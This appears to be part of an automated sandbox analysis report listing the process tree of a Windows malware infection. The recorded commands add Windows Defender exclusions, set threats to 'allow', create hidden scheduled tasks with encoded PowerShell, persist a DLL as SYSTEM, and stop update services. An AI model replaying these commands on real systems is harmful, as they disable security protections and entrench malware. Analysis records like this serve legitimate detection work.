    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2864
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5884
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3752
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5380
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5784
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5648
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5124
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5428
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5668
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5688
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1148
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6060
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5704
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gHGwpaBxQ" /SC once /ST 04:34:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:5272
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1216
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gHGwpaBxQ"
  2⤵
  PID:3952
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gHGwpaBxQ"
  2⤵
  PID:4824
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 03:23:21 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\HXauLnH.exe\" GH /FKYqdidgf 385118 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:5924
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "XyyyteIMwZeutaZuw"
  2⤵
  PID:5100

C:\Users\Admin\AppData\Local\Temp\7zS562A.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS562A.tmp\Install.exe it /WJjdidznYj 385118 /S
1⤵
PID:5396
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:5648
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:5776
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:3952
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5428
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5816
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5636
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:1720
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:4072
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:3512
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:5568
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:4904
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:5628
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5732
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:5416
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:5868
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6052
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5276
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4592
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:5692
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5200
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5968
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3752
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5504
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4592
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3332
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4968
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5580

C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
1⤵
PID:1400
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:5416
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3200
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4844
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:5600
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:5612
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:4104
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5916
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:4288
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:3040
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:2388
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:1192
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:4356
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:2968
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:5848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:5660

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
PID:3752

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
1⤵
PID:4164

C:\ProgramData\taskmgr.exe
C:\ProgramData\taskmgr.exe
1⤵
PID:5216

C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\HXauLnH.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\HXauLnH.exe GH /FKYqdidgf 385118 /S
1⤵
PID:1732
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:1944
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:3740
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:5936
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5556
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5204
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:6032
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5568
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:1892
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5548
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:5948
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
  2⤵
  PID:5224
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:1468
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:4480
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:5172
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5276
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:4384
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\yINcpz.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:5932

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
PID:6028

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
1⤵
PID:3108

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.dual-a-0034.a-msedge.net

g-bing-com.dual-a-0034.a-msedge.net

IN CNAME

dual-a-0034.a-msedge.net

dual-a-0034.a-msedge.net

IN A

204.79.197.237

dual-a-0034.a-msedge.net

IN A

13.107.21.237
GET

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8tz-vpQe9h7-ulKDwWBJ2qjVUCUxpeaBe7BF6tj6WmNu6xvJvvxYlkqnAnlPFh-Fve48pza2XAkT8R2x9MoaVexV-RXI5kjSoCAtDOMCrp6pOriB5rP-1LBsvU4WMriN18XavVWkR26ukRhjnecSWEguKpmaEBbR7LM3dE1WfI4jZlcEa%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D6f2c850fe4ba1225cc76e3244f72112d&TIME=20240426T132839Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8tz-vpQe9h7-ulKDwWBJ2qjVUCUxpeaBe7BF6tj6WmNu6xvJvvxYlkqnAnlPFh-Fve48pza2XAkT8R2x9MoaVexV-RXI5kjSoCAtDOMCrp6pOriB5rP-1LBsvU4WMriN18XavVWkR26ukRhjnecSWEguKpmaEBbR7LM3dE1WfI4jZlcEa%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D6f2c850fe4ba1225cc76e3244f72112d&TIME=20240426T132839Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55 HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=0F77A228E69F680F1D58B656E7B86947; domain=.bing.com; expires=Sat, 07-Jun-2025 09:50:40 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
